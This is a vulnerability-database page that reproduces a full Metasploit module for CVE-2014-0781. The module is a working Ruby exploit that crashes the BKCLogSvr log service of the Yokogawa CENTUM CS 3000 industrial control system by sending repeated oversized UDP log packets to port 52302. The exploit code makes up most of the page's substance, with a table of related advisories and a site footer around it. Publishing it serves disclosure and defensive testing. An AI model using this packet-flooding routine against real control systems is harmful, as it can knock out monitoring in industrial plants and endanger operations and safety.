Vulners
Lucene search
Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow
🗓️ 31 Aug 2024 00:00:00Reported by juan vazquez, Julian Vilas, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 178 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2014-0781 | 29 May 201815:50 | – | circl |
 | CVE-2014-0781 | 14 Mar 201410:00 | – | cve |
 | CVE-2014-0781 Yokogawa CENTUM CS 3000 Heap-based Buffer Overflow | 14 Mar 201410:00 | – | cvelist |
 | EUVD-2014-0812 | 7 Oct 202500:30 | – | euvd |
 | Yokogawa Multiple Products Vulnerabilities | 13 Feb 201407:00 | – | ics |
 | Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow | 10 Mar 201415:12 | – | metasploit |
 | CVE-2014-0781 | 14 Mar 201410:55 | – | nvd |
 | Yokogawa Centum Improper Restriction of Operations within the Bounds of a Memory Buffer | 8 Nov 201900:00 | – | nessus |
| Yokogawa (CVE-2014-0781) (deprecated) | 7 Feb 202200:00 | – | nessus |
| Yokogawa CENTUM CS 3000 R3.08.50 Buffer Overflow / Denial of Service | 10 Mar 202500:00 | – | packetstorm |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow',
'Description' => %q{
This module abuses a buffer overflow vulnerability to trigger a Denial of Service
of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability
exists in the handling of malformed log packets, with an unexpected long level field.
The root cause of the vulnerability is a combination of usage of uninitialized memory
from the stack and a dangerous string copy. This module has been tested successfully
on Yokogawa CENTUM CS 3000 R3.08.50.
},
'Author' =>
[
'juan vazquez',
'Redsadic <julian.vilas[at]gmail.com>'
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/' ],
[ 'CVE', '2014-0781']
],
'DisclosureDate' => '2014-03-10',
))
register_options(
[
Opt::RPORT(52302),
OptInt.new('RLIMIT', [true, "Number of packets to send", 10])
])
end
def run
if datastore['RLIMIT'] < 2
print_error("Two consecutive packets are needed to trigger the DoS condition. Please increment RLIMIT.")
return
end
# Crash due to read bad memory
test = [1024].pack("V") # packet length
test << "AAAA" # Unknown
test << "SOURCE\x00\x00" # Source
test << "\x00" * 8 # Padding
test << "B" * (1024 - test.length) # Level & Message coalesced
connect_udp
# Sending two consecutives packages is enough to
# trigger the overflow and cause the DoS. But if
# legit packets are processed by the server, between
# the two malformed packages, overflow won't happen.
# Unfortunately because of the usage of UDP and the
# absence of answer, there isn't a reliable way to
# check if the DoS condition has been triggered.
print_status("Sending #{datastore['RLIMIT']} packets...")
(1..datastore['RLIMIT']).each do |i|
vprint_status("Sending #{i}/#{datastore['RLIMIT']}...")
udp_sock.put(test)
end
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.07516